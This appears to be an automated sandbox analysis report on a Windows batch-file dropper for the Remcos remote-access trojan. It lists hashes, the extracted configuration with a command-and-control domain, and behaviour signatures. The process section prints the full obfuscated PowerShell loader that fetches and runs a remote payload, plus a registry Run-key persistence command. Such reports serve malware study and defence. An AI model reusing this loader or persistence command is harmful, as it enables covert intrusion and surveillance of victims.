Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-12-2024 01:32

General

  • Target

    229c4ce294708561801b16eed5a155c8cfe8c965ea99ac3cfb4717a35a1492f3.bat

  • Size

    4KB

  • MD5

    7d81c68c80b51bfcdea2e11ac99e606f

  • SHA1

    5c0dae6d1b7e77f806fbeb537921222ad5136c9b

  • SHA256

    229c4ce294708561801b16eed5a155c8cfe8c965ea99ac3cfb4717a35a1492f3

  • SHA512

    8a5b8d97f8e2c344a32d6ee8fe93ba020fc01dc1717500214c1235af8fe9030d0c3bd5b540d0d78699b2eaa4dadaefe7417274ebf683dc1e71b56851d8acc10b

  • SSDEEP

    96:VDCwylmfZfGRN+0ndbI+Cd/Pfo2zkDVPKKb8Bv:VmuZf2nds+CFo28sKb81

Malware Config

Extracted

Family

remcos

Botnet

PeeWe8646

C2

www.autoshausamsachsenwald.de:6698

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Weepee83472-FSSJ2L

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 41 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\229c4ce294708561801b16eed5a155c8cfe8c965ea99ac3cfb4717a35a1492f3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "<#Ferskvandsfiskerierne Klenes Middelvejen Semicartilaginous #>;$Racette136='Civiliseringschance';<#Skabehoveder Papirpresser Kvalifikationsniveauet gidens #>;$Predeficiently=$Fortredes+$host.UI;If ($Predeficiently) {$Blazoned++;}function Gyps($Pernickety){$Appendiculariidae=$Sealflower+$Pernickety.Length-$Blazoned; for( $Ekvilibrisme222=2;$Ekvilibrisme222 -lt $Appendiculariidae;$Ekvilibrisme222+=3){$Tegnefilmenes='Sprtning';$Spoonbill+=$Pernickety[$Ekvilibrisme222];$Urinaler='snvrest';}$Spoonbill;}function lsevrdig($Udarmes){ . ($iliopelvic) ($Udarmes);}$Souvlaki=Gyps 'I MUnoKrz EiC lSklEiaSo/ B5 .Ib0 a Ti(B WPhi ,n CdDeo wInsSa .rN ATs Pi1 d0 e.La0Ba;Fe NeW iNdnSu6 4H ; I E xKy6 4W ; R Flrh vBo:Wi1Un2Ch1Au.Ov0 ) iG,reRtcBekOvo o/ R2A 0Cu1Fy0.e0,u1s 0 1Te DyFV.inorS.e AfLioScxS /Es1Mo2Pl1 . i0Br ';$Lokalplanomraadernes=Gyps 'TeuLsSI EAcrAf- dAE,GBjEO,NT tBl ';$Imperator=Gyps ' h.otH t ,pFis :,r/gr/ UwStw owDo.Int MwLiiGe-UniS nIntRoeDirwiiIsoB.rI,.HodH e.w/ eLMaILnVOmE y/ Bw epIn-Dainen ecExl NuS,dS eArs.k/ aIL.XM RRe/ViA jl obFrrAceexkKotUxs v.I qGrx ddF ';$svrvgtsbokserens=Gyps ' l> G ';$iliopelvic=Gyps 'GhiLyeA x ';$Reclame='indberetningspligten';$Skint='\uncontradictablely.Ove';lsevrdig (Gyps 'm $ ngAflPoOFuBM,AAsLEf: aFs,OR.XIntSte,er .rS I E mrTie BN ,=Ex$ E.dNTeVHa: GAWepEtpabdPhAtoTAlaTr+,u$ oS ,K DiLen at L ');lsevrdig (Gyps 'b $SpGI lFao BBBlAJ LUn: UpX UCyl TM OD,nTwaSmR vi Ba o= S$GeIS m KP.leLarDuAC T ioL.RPr.Uns rPMalR i rT.e(Ca$PrS ,v MrEuV PgMeTBesStBGeoP k nSH EM,RLoE NH SDa)Le ');lsevrdig (Gyps 'No[GanL eFrT R.Sis,reUnrMiv Ni .c Me pS OSkIMln,qTBeMnyavrNMlAA G.neEnRSu]Ve:ka:CoSUsEDiC.ouHvrDei lT,ry PKaRTyO tMiOBeCO o cL i ,h=Be T.[deNCaEMiT a.StsovEStcTeu crBli dTa yTiPNaRMeo dT ,OCaCHeoC lH t Y CP TeAm]He: l:I.TVoLS s,n1S.2sv ');$Imperator=$Pulmonaria[0];$Rishsts=(Gyps ' U$ uG mlA OClb kAChlI : ,a nIntPrI p,eA RT Yh,eAMuRReISkaFrn a=QunTrEHew e-B O B j E pCGaTDe .rs SykosTrTH e lmTy.BiNDreT T l. ,w SETyB ecUnl .i EEzNPltDi ');lsevrdig ($Rishsts);lsevrdig (Gyps 'F $P AWinT tE.i spruaa t BhD,aBurofiP,aSlnAf.ElH,aeInaPld eKar Dsse[ u$NaL o .kDaatrlK pGul aaConBao PmB rA.aBeaU,dHoeTerTanN eTrs.p]he= j$ SS oEmuA v ylPia IkMyi u ');$Hydrometridae=Gyps ' U$E.ATanbetB iQupsaa OtSthVaaHor KiKlaNon L.LyD CoTawRynA,lProInaKadNoF piGsl,ieBo(Al$ II mFopCre Cr,ia,it MoinrOv,Fr$KuALadOvvuno Ok ,aFotB,u KrReeAlrsa) S ';$Advokaturer=$Foxterrieren;lsevrdig (Gyps ' ,$,eg NlPaoRiB AA ,LIm:FlCM,R PA.ans,ISjAKotEnE.eS,u= N(.ntWoE.tsWatS - aPV A ItI hS. B $afaNaDInvByOAfkMiaA.TPoU SR eDerF ) T ');while (!$craniates) {lsevrdig (Gyps 'Ty$ Cg GlRsoTeb fainlme:KiUUnn ci nm SmReeprdG iSta tM,eDilG yHy= S$ tAkr Eu eeBo ') ;lsevrdig $Hydrometridae;lsevrdig (Gyps 'Wes PT DACar ntA - aSSjLFyESeeGaP T S 4D ');lsevrdig (Gyps ' n$TogK,LThOB B,nAW L :z,CC,rUnA CnS Ia a T Je JsUn=Di(OpTOvENos dTS.- up ,AJoT PHDe G$,iA .d,ov RoGrKEfA aTI uSeRste R f) S ') ;lsevrdig (Gyps ' u$EkgEmLL oBibFeA VLMe: lW,ENana,iDiT FiO V ReFoLHyYSa=ap$EsG LlGrO abcyaC Lfo:Fog lMiABrt Sk .rT S e,rl.p+Ga+ S% n$B,pSkURel SMovo cN iaS RGai OA o.poCPaOBiUB nDiT S ') ;$Imperator=$Pulmonaria[$Lenitively];}$Denimens53=318932;$Crotchet=27290;lsevrdig (Gyps 'Si$LaG ulIrostb LAReLLe: otFouS rP EG D IER SC o=sl A.G CE ltOp-miCStoSunStTFoE UN,vTP $OpAG d ov rO dKepATotbeuBlR FeBeRA. ');lsevrdig (Gyps 'Ta$V,gNolReoSabS.aFil ,:FlAHjf stFleocrb nF,oLio onTes C M,=S Re[,iSO.y Ds Pt ,eRimNe. uCwhotenStvLyeF r Ct,r] c:ha:JeF PrOuoW mInBS a scleFo6,i4 SFotVarFaiSnn Sg B(Dy$b T cuRorDie dKneOms ) W ');lsevrdig (Gyps 'Sa$ PgInLGeo aB ca.eL.g:PrAN PDoOu LfrlNoICoN AA lRspISks IENorQuN AE usAg ,=Fa Fi[h s lY SNat CeKuMDi.E,tSaeArxGeTNo. eEuN gCR OKaD oI SNMeg r]He:Kt: aFiSS CB.iFoi u.FagA,ET,TKlS.etP rU iFanD.G t(.i$ fAUnFFeT.oE.nR ,nCooStoMoN.isCo) P ');lsevrdig (Gyps 'Ar$LoGShL SO tBNoA PLSe:miNR.OBrNboe.uXT p,aO pnWoEPenCrTSoi oa pl,uLKoY =.u$NoAilP SO alHelBriU N nAW.R .i.rS,ieSarFanDiE ISD .Dus,eU oBreSNrt,ir Ci KNJyGSi( n$grD.yeTrnT IbjM ,e GnNrSU 5 ,3Te,Ca$ CToRU O nTE c ,HL e CT a)Pa ');lsevrdig $nonexponentially;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4032
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Ferskvandsfiskerierne Klenes Middelvejen Semicartilaginous #>;$Racette136='Civiliseringschance';<#Skabehoveder Papirpresser Kvalifikationsniveauet gidens #>;$Predeficiently=$Fortredes+$host.UI;If ($Predeficiently) {$Blazoned++;}function Gyps($Pernickety){$Appendiculariidae=$Sealflower+$Pernickety.Length-$Blazoned; for( $Ekvilibrisme222=2;$Ekvilibrisme222 -lt $Appendiculariidae;$Ekvilibrisme222+=3){$Tegnefilmenes='Sprtning';$Spoonbill+=$Pernickety[$Ekvilibrisme222];$Urinaler='snvrest';}$Spoonbill;}function lsevrdig($Udarmes){ . ($iliopelvic) ($Udarmes);}$Souvlaki=Gyps 'I MUnoKrz EiC lSklEiaSo/ B5 .Ib0 a Ti(B WPhi ,n CdDeo wInsSa .rN ATs Pi1 d0 e.La0Ba;Fe NeW iNdnSu6 4H ; I E xKy6 4W ; R Flrh vBo:Wi1Un2Ch1Au.Ov0 ) iG,reRtcBekOvo o/ R2A 0Cu1Fy0.e0,u1s 0 1Te DyFV.inorS.e AfLioScxS /Es1Mo2Pl1 . i0Br ';$Lokalplanomraadernes=Gyps 'TeuLsSI EAcrAf- dAE,GBjEO,NT tBl ';$Imperator=Gyps ' h.otH t ,pFis :,r/gr/ UwStw owDo.Int MwLiiGe-UniS nIntRoeDirwiiIsoB.rI,.HodH e.w/ eLMaILnVOmE y/ Bw epIn-Dainen ecExl NuS,dS eArs.k/ aIL.XM RRe/ViA jl obFrrAceexkKotUxs v.I qGrx ddF ';$svrvgtsbokserens=Gyps ' l> G ';$iliopelvic=Gyps 'GhiLyeA x ';$Reclame='indberetningspligten';$Skint='\uncontradictablely.Ove';lsevrdig (Gyps 'm $ ngAflPoOFuBM,AAsLEf: aFs,OR.XIntSte,er .rS I E mrTie BN ,=Ex$ E.dNTeVHa: GAWepEtpabdPhAtoTAlaTr+,u$ oS ,K DiLen at L ');lsevrdig (Gyps 'b $SpGI lFao BBBlAJ LUn: UpX UCyl TM OD,nTwaSmR vi Ba o= S$GeIS m KP.leLarDuAC T ioL.RPr.Uns rPMalR i rT.e(Ca$PrS ,v MrEuV PgMeTBesStBGeoP k nSH EM,RLoE NH SDa)Le ');lsevrdig (Gyps 'No[GanL eFrT R.Sis,reUnrMiv Ni .c Me pS OSkIMln,qTBeMnyavrNMlAA G.neEnRSu]Ve:ka:CoSUsEDiC.ouHvrDei lT,ry PKaRTyO tMiOBeCO o cL i ,h=Be T.[deNCaEMiT a.StsovEStcTeu crBli dTa yTiPNaRMeo dT ,OCaCHeoC lH t Y CP TeAm]He: l:I.TVoLS s,n1S.2sv ');$Imperator=$Pulmonaria[0];$Rishsts=(Gyps ' U$ uG mlA OClb kAChlI : ,a nIntPrI p,eA RT Yh,eAMuRReISkaFrn a=QunTrEHew e-B O B j E pCGaTDe .rs SykosTrTH e lmTy.BiNDreT T l. ,w SETyB ecUnl .i EEzNPltDi ');lsevrdig ($Rishsts);lsevrdig (Gyps 'F $P AWinT tE.i spruaa t BhD,aBurofiP,aSlnAf.ElH,aeInaPld eKar Dsse[ u$NaL o .kDaatrlK pGul aaConBao PmB rA.aBeaU,dHoeTerTanN eTrs.p]he= j$ SS oEmuA v ylPia IkMyi u ');$Hydrometridae=Gyps ' U$E.ATanbetB iQupsaa OtSthVaaHor KiKlaNon L.LyD CoTawRynA,lProInaKadNoF piGsl,ieBo(Al$ II mFopCre Cr,ia,it MoinrOv,Fr$KuALadOvvuno Ok ,aFotB,u KrReeAlrsa) S ';$Advokaturer=$Foxterrieren;lsevrdig (Gyps ' ,$,eg NlPaoRiB AA ,LIm:FlCM,R PA.ans,ISjAKotEnE.eS,u= N(.ntWoE.tsWatS - aPV A ItI hS. B $afaNaDInvByOAfkMiaA.TPoU SR eDerF ) T ');while (!$craniates) {lsevrdig (Gyps 'Ty$ Cg GlRsoTeb fainlme:KiUUnn ci nm SmReeprdG iSta tM,eDilG yHy= S$ tAkr Eu eeBo ') ;lsevrdig $Hydrometridae;lsevrdig (Gyps 'Wes PT DACar ntA - aSSjLFyESeeGaP T S 4D ');lsevrdig (Gyps ' n$TogK,LThOB B,nAW L :z,CC,rUnA CnS Ia a T Je JsUn=Di(OpTOvENos dTS.- up ,AJoT PHDe G$,iA .d,ov RoGrKEfA aTI uSeRste R f) S ') ;lsevrdig (Gyps ' u$EkgEmLL oBibFeA VLMe: lW,ENana,iDiT FiO V ReFoLHyYSa=ap$EsG LlGrO abcyaC Lfo:Fog lMiABrt Sk .rT S e,rl.p+Ga+ S% n$B,pSkURel SMovo cN iaS RGai OA o.poCPaOBiUB nDiT S ') ;$Imperator=$Pulmonaria[$Lenitively];}$Denimens53=318932;$Crotchet=27290;lsevrdig (Gyps 'Si$LaG ulIrostb LAReLLe: otFouS rP EG D IER SC o=sl A.G CE ltOp-miCStoSunStTFoE UN,vTP $OpAG d ov rO dKepATotbeuBlR FeBeRA. ');lsevrdig (Gyps 'Ta$V,gNolReoSabS.aFil ,:FlAHjf stFleocrb nF,oLio onTes C M,=S Re[,iSO.y Ds Pt ,eRimNe. uCwhotenStvLyeF r Ct,r] c:ha:JeF PrOuoW mInBS a scleFo6,i4 SFotVarFaiSnn Sg B(Dy$b T cuRorDie dKneOms ) W ');lsevrdig (Gyps 'Sa$ PgInLGeo aB ca.eL.g:PrAN PDoOu LfrlNoICoN AA lRspISks IENorQuN AE usAg ,=Fa Fi[h s lY SNat CeKuMDi.E,tSaeArxGeTNo. eEuN gCR OKaD oI SNMeg r]He:Kt: aFiSS CB.iFoi u.FagA,ET,TKlS.etP rU iFanD.G t(.i$ fAUnFFeT.oE.nR ,nCooStoMoN.isCo) P ');lsevrdig (Gyps 'Ar$LoGShL SO tBNoA PLSe:miNR.OBrNboe.uXT p,aO pnWoEPenCrTSoi oa pl,uLKoY =.u$NoAilP SO alHelBriU N nAW.R .i.rS,ieSarFanDiE ISD .Dus,eU oBreSNrt,ir Ci KNJyGSi( n$grD.yeTrnT IbjM ,e GnNrSU 5 ,3Te,Ca$ CToRU O nTE c ,HL e CT a)Pa ');lsevrdig $nonexponentially;"
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtCreateThreadExHideFromDebugger
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hoplonemertine101" /t REG_EXPAND_SZ /d "%Problemlsningernes% -windowstyle 1 $hovedtal=(gp -Path 'HKCU:\Software\Maerkes\').Photosensitizers;%Problemlsningernes% ($hovedtal)"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1544
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hoplonemertine101" /t REG_EXPAND_SZ /d "%Problemlsningernes% -windowstyle 1 $hovedtal=(gp -Path 'HKCU:\Software\Maerkes\').Photosensitizers;%Problemlsningernes% ($hovedtal)"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:1592

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hn3nh02l.ev4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\uncontradictablely.Ove

    Filesize

    450KB

    MD5

    e40500a08fc8668ca9ea853b2b2b09c1

    SHA1

    bd64e99f8c8456d1679200aa28626dd2f226ce35

    SHA256

    298497a8602a18e3ea367aeef9988ec043f7dcd6da6e18f65eab116590ed27bc

    SHA512

    6deb464711e24ced75de084dca694365c5e72fe9844d584497b22efa145c231a991d3ebf27183d499bdc9c837f27366125326ad4c805748540049119ad8f98d7

  • memory/4032-12-0x000002224EB20000-0x000002224EB42000-memory.dmp

    Filesize

    136KB

  • memory/4032-13-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-14-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-17-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-18-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-21-0x0000022250D00000-0x0000022250F1C000-memory.dmp

    Filesize

    2.1MB

  • memory/4032-22-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-2-0x00007FFD8D673000-0x00007FFD8D675000-memory.dmp

    Filesize

    8KB

  • memory/4940-41-0x0000000005E40000-0x0000000005E5E000-memory.dmp

    Filesize

    120KB

  • memory/4940-47-0x00000000082E0000-0x0000000008884000-memory.dmp

    Filesize

    5.6MB

  • memory/4940-27-0x0000000004F60000-0x0000000004F82000-memory.dmp

    Filesize

    136KB

  • memory/4940-28-0x0000000005000000-0x0000000005066000-memory.dmp

    Filesize

    408KB

  • memory/4940-29-0x00000000050E0000-0x0000000005146000-memory.dmp

    Filesize

    408KB

  • memory/4940-39-0x0000000005850000-0x0000000005BA4000-memory.dmp

    Filesize

    3.3MB

  • memory/4940-25-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-24-0x0000000002610000-0x0000000002646000-memory.dmp

    Filesize

    216KB

  • memory/4940-42-0x0000000005ED0000-0x0000000005F1C000-memory.dmp

    Filesize

    304KB

  • memory/4940-43-0x00000000076B0000-0x0000000007D2A000-memory.dmp

    Filesize

    6.5MB

  • memory/4940-44-0x00000000063B0000-0x00000000063CA000-memory.dmp

    Filesize

    104KB

  • memory/4940-45-0x00000000070F0000-0x0000000007186000-memory.dmp

    Filesize

    600KB

  • memory/4940-46-0x0000000007080000-0x00000000070A2000-memory.dmp

    Filesize

    136KB

  • memory/4940-26-0x0000000005220000-0x0000000005848000-memory.dmp

    Filesize

    6.2MB

  • memory/4940-23-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

    Filesize

    4KB

  • memory/4940-49-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-50-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-51-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-52-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-53-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-54-0x0000000008890000-0x0000000009FCB000-memory.dmp

    Filesize

    23.2MB

  • memory/4940-55-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

    Filesize

    4KB

  • memory/4940-56-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-57-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-58-0x0000000074B00000-0x00000000752B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4940-66-0x00000000236E0000-0x0000000024934000-memory.dmp

    Filesize

    18.3MB

  • memory/4940-73-0x00000000236E0000-0x0000000024934000-memory.dmp

    Filesize

    18.3MB